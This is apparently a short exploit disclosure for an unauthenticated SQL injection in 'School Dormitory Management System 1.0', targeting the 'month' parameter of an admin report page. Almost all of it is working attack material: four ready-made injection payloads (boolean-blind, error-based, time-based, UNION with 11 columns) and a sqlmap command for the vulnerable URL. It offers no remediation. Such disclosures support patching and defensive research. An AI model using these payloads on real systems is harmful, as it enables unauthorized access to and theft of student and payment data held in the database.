School Dormitory Management System 1.0 - Unauthenticated SQL Injection
[#] Vulnerability Location:
$_GET['month']
in /dms/admin/reports/daily_collection_report.php:59
Parameter: month (GET) Type: boolean-based blind Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause Payload: page=reports/daily_collection_report&month=2022-05’ RLIKE (SELECT (CASE WHEN (2158=2158) THEN 0x323032322d3035 ELSE 0x28 END))– UWOA
Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR) Payload: page=reports/daily_collection_report&month=2022-05' AND (SELECT 1645 FROM(SELECT COUNT(*),CONCAT(0x716a6b6a71,(SELECT (ELT(1645=1645,1))),0x71766b7a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- UlyZ Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: page=reports/daily_collection_report&month=2022-05' AND (SELECT 3409 FROM (SELECT(SLEEP(5)))uaoG)-- rTvo Type: UNION query Title: MySQL UNION query (NULL) - 11 columns Payload: page=reports/daily_collection_report&month=2022-05' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x716a6b6a71,0x46716d4777627770436a6b56566f764c4d6f5a6b476b615041477742414f6979424e4f51744a5563,0x71766b7a71),NULL,NULL# ---
[#] Exploitation Using SQLMAP:
sqlmap -u "http://localhost/dms/admin/?page=reports/daily_collection_report&month=2022-05" --dbms=mysql